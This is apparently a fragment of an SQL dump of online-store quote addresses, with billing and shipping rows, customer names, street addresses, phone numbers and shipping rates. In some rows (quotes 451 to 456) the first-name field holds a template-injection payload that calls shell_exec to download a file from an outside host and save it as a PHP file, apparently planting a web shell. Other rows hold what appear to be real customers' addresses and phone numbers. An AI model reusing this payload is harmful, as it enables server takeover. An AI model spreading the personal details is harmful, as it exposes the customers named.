(527, 445, '2025-02-09 16:26:21', '2025-02-09 16:26:21', NULL, 0, NULL, 'billing', NULL, NULL, 'Mervin', NULL, 'Hegmann', NULL, 'Mervin Company', '504 Parkridge Ave', 'Huxley', 'Iowa', NULL, '50124', 'US', '12086968850', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(528, 445, '2025-02-09 16:26:21', '2025-02-09 16:26:27', NULL, 0, NULL, 'shipping', NULL, NULL, 'Mervin', NULL, 'Hegmann', NULL, 'Mervin Company', '504 Parkridge Ave', 'Huxley', 'Iowa', 25, '50124', 'US', '12086968850', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(529, 446, '2025-02-23 04:23:10', '2025-02-23 04:23:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(530, 446, '2025-02-23 04:23:10', '2025-02-23 04:23:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(531, 447, '2025-02-28 19:58:26', '2025-02-28 19:58:26', 111, 0, NULL, 'billing', 'lnjybaho@do-not-respond.me', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(532, 447, '2025-02-28 19:58:26', '2025-02-28 19:58:26', 111, 0, NULL, 'shipping', 'lnjybaho@do-not-respond.me', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(533, 448, '2025-03-03 03:01:53', '2025-03-03 03:01:53', NULL, 0, NULL, 'billing', NULL, NULL, 'Sue', NULL, 'Shannon', NULL, 'Sue Brown', '1645 N Spring St', 'Slidell', 'Louisiana', 28, '70458', 'US', '9852654209', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(534, 448, '2025-03-03 03:01:53', '2025-03-03 03:02:06', NULL, 0, NULL, 'shipping', NULL, NULL, 'Sue', NULL, 'Shannon', NULL, 'Sue', '1645 N Spring St', 'Slidell', 'Louisiana', 28, '70458', 'US', '9852654209', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(535, 449, '2025-03-05 14:27:58', '2025-03-05 14:27:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(536, 449, '2025-03-05 14:27:58', '2025-03-05 14:27:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(537, 450, '2025-03-08 11:10:29', '2025-03-08 11:10:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(538, 450, '2025-03-08 11:10:29', '2025-03-08 11:10:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 762.0000, 40911.0000, 40911.0000, 32728.8000, 32728.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -8182.2000, -8182.2000, 32728.8000, 32728.8000, NULL, '[]', NULL, 0.0000, 0.0000, 40911.0000, 40911.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(539, 451, '2025-03-09 15:52:17', '2025-03-09 15:52:17', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Los Angels', 'California', 12, '90017', 'US', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(540, 451, '2025-03-09 15:52:17', '2025-03-09 15:52:27', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Los Angels', 'California', 12, '90017', 'US', '3455543453', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(541, 452, '2025-03-09 15:52:42', '2025-03-09 15:52:42', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, 'Ouverture\n214', 'Eindhoven', 'Noord-Brabant', 32, '5629PX', 'NL', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(542, 452, '2025-03-09 15:52:42', '2025-03-09 15:52:47', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, 'Ouverture\n214', 'Eindhoven', 'Noord-Brabant', 32, '5629PX', 'NL', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(543, 453, '2025-03-09 15:53:01', '2025-03-09 15:53:01', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Schaffhausen', 120, '2345', 'CH', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(544, 453, '2025-03-09 15:53:01', '2025-03-09 15:53:06', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Schaffhausen', 120, '2345', 'CH', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(545, 454, '2025-03-09 15:53:18', '2025-03-09 15:53:18', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'London', 'London', 579, 'AB12 3DC', 'GB', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(546, 454, '2025-03-09 15:53:18', '2025-03-09 15:53:21', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'London', 'London', 579, 'AB12 3DC', 'GB', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(547, 455, '2025-03-09 15:53:37', '2025-03-09 15:53:37', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Paris', 'Paris', 579, '23423', 'FR', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(548, 455, '2025-03-09 15:53:37', '2025-03-09 15:53:41', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Paris', 'Paris', 579, '23423', 'FR', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(549, 456, '2025-03-09 15:53:54', '2025-03-09 15:53:54', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Baja California Sur', 579, '23454', 'MX', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(550, 456, '2025-03-09 15:53:54', '2025-03-09 15:53:57', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Baja California Sur', 579, '23454', 'MX', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(551, 457, '2025-03-30 07:00:32', '2025-03-30 07:00:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(552, 457, '2025-03-30 07:00:32', '2025-03-30 07:00:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(553, 458, '2025-03-30 07:39:49', '2025-03-30 07:39:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(554, 458, '2025-03-30 07:39:49', '2025-03-30 07:39:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(555, 459, '2025-03-30 07:43:21', '2025-03-30 07:43:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(556, 459, '2025-03-30 07:43:21', '2025-03-30 07:43:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(557, 460, '2025-03-30 07:44:50', '2025-03-30 07:44:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(558, 460, '2025-03-30 07:44:50', '2025-03-30 07:44:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(559, 461, '2025-03-30 07:47:56', '2025-03-30 07:47:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(560, 461, '2025-03-30 07:47:56', '2025-03-30 07:47:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(561, 462, '2025-03-30 07:49:29', '2025-03-30 07:49:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(562, 462, '2025-03-30 07:49:29', '2025-03-30 07:49:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(563, 463, '2025-03-30 07:51:18', '2025-03-30 07:51:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(564, 463, '2025-03-30 07:51:18', '2025-03-30 07:51:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(565, 464, '2025-03-30 07:52:45', '2025-03-30 07:52:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(566, 464, '2025-03-30 07:52:45', '2025-03-30 07:52:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
